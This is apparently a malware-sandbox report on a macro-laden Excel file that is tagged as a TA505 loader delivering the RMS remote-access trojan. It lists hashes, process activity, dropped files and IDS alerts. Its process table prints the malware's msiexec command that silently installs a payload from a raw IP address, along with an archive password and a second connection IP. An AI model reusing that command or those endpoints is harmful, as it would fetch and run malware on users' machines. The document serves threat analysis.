analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

CRT84477_0419.xls

Full analysis: https://app.any.run/tasks/21025398-84d3-4a13-a559-4c6b34e3057f
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 24, 2019, 20:29:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
exe-to-msi
rat
rms
ta505
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Fri Apr 19 09:35:24 2019, Security: 0
MD5:

A4454AAEE9B25A02D7478FF64D7D8FB7

SHA1:

A4416C840194C754D0849B289D91036DDDB456F3

SHA256:

FB3C0A4449B1D97AA759C2D47BFBE6D82C0466C6B5BF58A5BD8637314BC2A871

SSDEEP:

3072:DKpb8rGYrMPelwhKmFV5xtezEsgrdgHZB7QB9oZXagBByVyrrpUQjeKgfaOLEsC:DKpb8rGYrMPelwhKmFV5xtuEsgrdgrER

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • EXCEL.EXE (PID: 1824)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 1824)
    • Downloads executable files from IP

      • msiexec.exe (PID: 2524)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2524)
    • Application was dropped or rewritten from another process

      • exit.exe (PID: 2832)
      • uninstall.exe (PID: 296)
      • exit.exe (PID: 1020)
      • winserv.exe (PID: 3004)
    • Loads dropped or rewritten executable

      • cmd.exe (PID: 572)
    • Changes the autorun value in the registry

      • reg.exe (PID: 2348)
    • RMS RAT was detected

      • winserv.exe (PID: 3004)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2524)
      • MSI35D0.tmp (PID: 3408)
      • cmd.exe (PID: 572)
      • uninstall.exe (PID: 296)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2524)
    • Starts CMD.EXE for commands execution

      • exit.exe (PID: 2832)
      • exit.exe (PID: 1020)
    • Creates files in the program directory

      • uninstall.exe (PID: 296)
    • Reads Environment values

      • winserv.exe (PID: 3004)
    • Reads Windows Product ID

      • winserv.exe (PID: 3004)
    • Reads the machine GUID from the registry

      • winserv.exe (PID: 3004)
    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 1836)
    • Creates files in the user directory

      • winserv.exe (PID: 3004)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 1836)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 1824)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 2524)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2524)
    • Application was dropped or rewritten from another process

      • MSI35D0.tmp (PID: 3408)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

CompObjUserType: ???? Microsoft Excel 2003
CompObjUserTypeLen: 26
HeadingPairs:
  • Листы
  • 1
  • Макросы Excel 4.0
  • 1
TitleOfParts:
  • 1
  • 2
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
Company: Microsoft Corporation
CodePage: Windows Cyrillic
Security: None
ModifyDate: 2019:04:19 08:35:24
CreateDate: 2018:12:19 10:42:12
Software: Microsoft Excel
LastModifiedBy: 1
Author: Microsoft Office
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
209
Monitored processes
174
Malicious processes
9
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start excel.exe no specs msiexec.exe no specs msiexec.exe msi35d0.tmp exit.exe no specs cmd.exe ping.exe no specs ping.exe no specs uninstall.exe exit.exe no specs cmd.exe no specs reg.exe #RMS winserv.exe taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1824"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
3076msiexec.exe RETURN=404 /i http://169.239.128.168/dynhost /q DIR='%TMP%' C:\Windows\system32\msiexec.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2524C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3408"C:\Windows\Installer\MSI35D0.tmp"C:\Windows\Installer\MSI35D0.tmp
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2832"C:\Users\admin\AppData\Local\Temp\exit.exe" C:\Users\admin\AppData\Local\Temp\exit.exeMSI35D0.tmp
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
572cmd /c i.cmdC:\Windows\system32\cmd.exe
exit.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
628ping www.cloudflare.com -n 3 -w 3000C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3360ping www.cloudflare.com -n 3 -w 1000C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
296uninstall.exe x -p3KPnoNJ3ReME4bEU5W9APkKS5ErkR3tNRT -yC:\Users\admin\AppData\Local\Temp\uninstall.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1020"C:\ProgramData\LemonTrack Installer\exit.exe" C:\ProgramData\LemonTrack Installer\exit.exeuninstall.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 923
Read events
1 839
Write events
0
Delete events
0

Modification events

No data
Executable files
7
Suspicious files
3
Text files
13
Unknown types
3

Dropped files

PID
Process
Filename
Type
1824EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRDC3.tmp.cvr
MD5:
SHA256:
2524msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFC2ADEE3CDE1FE591.TMP
MD5:
SHA256:
2524msiexec.exeC:\Config.Msi\1234b6.rbs
MD5:
SHA256:
2524msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF039E4D9FB6B871FE.TMP
MD5:
SHA256:
2524msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:C7F250BAF15FB1E95B9C5B306C84F7D3
SHA256:2BD6734AC87C1A34B5CF5E774BF601423F309F3ADEBD79ED57862F8B078E3F6A
2524msiexec.exeC:\Windows\Installer\MSI35D0.tmpexecutable
MD5:0D3E25085527DF0160893FDAA00F6565
SHA256:F74BEDCB4AC33F7343FBBABEC0F636B887D92C06E156AC765F345732CF6CBCE8
3408MSI35D0.tmpC:\Users\admin\AppData\Local\Temp\i.cmdtext
MD5:FA86BC267E82D0E76651A617CDDE2462
SHA256:59D825F5965B4CFECDC67F6AFEC973D41B5FB2EE3F2C2FE5575B5CCA4EDDBF1D
2524msiexec.exeC:\Windows\Installer\MSI172A.tmpexecutable
MD5:ADA801D8C07FB13A8C8904B70B142904
SHA256:988F4869E55317FB97AAD3BDE4FDB89180148EA7DD6EBA7D84F8D1A3D5FB027B
2524msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\EXKH8PP2\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
3408MSI35D0.tmpC:\Users\admin\AppData\Local\Temp\kernel.dllexecutable
MD5:573A2619AF8C3DE0C3F376D8B100DB69
SHA256:17B20AA770CCF250B5ADED470FBBAA329856543022BA21F993D5FA02EBB670C7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2524
msiexec.exe
GET
200
169.239.128.168:80
http://169.239.128.168/dynhost
ZA
executable
3.95 Mb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2524
msiexec.exe
169.239.128.168:80
Zappie Host LLC
ZA
suspicious
3004
winserv.exe
159.69.48.50:5655
US
suspicious

DNS requests

Domain
IP
Reputation
www.cloudflare.com
  • 104.17.209.9
  • 104.17.210.9
whitelisted

Threats

PID
Process
Class
Message
2524
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
2524
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
2 ETPRO signatures available at the full report
Process
Message
winserv.exe
Error WTSQueryUserToken #1314
winserv.exe
24-05-2019_21:30:25:554#T:Error #20 @2
winserv.exe
24-05-2019_21:30:54:414#T:Msg Size: 104
winserv.exe
24-05-2019_21:30:54:414#T:Msg code: 3
winserv.exe
24-05-2019_21:30:54:414#T:MSG_KEEP_ALIVE
winserv.exe
MSG_KEEP_ALIVE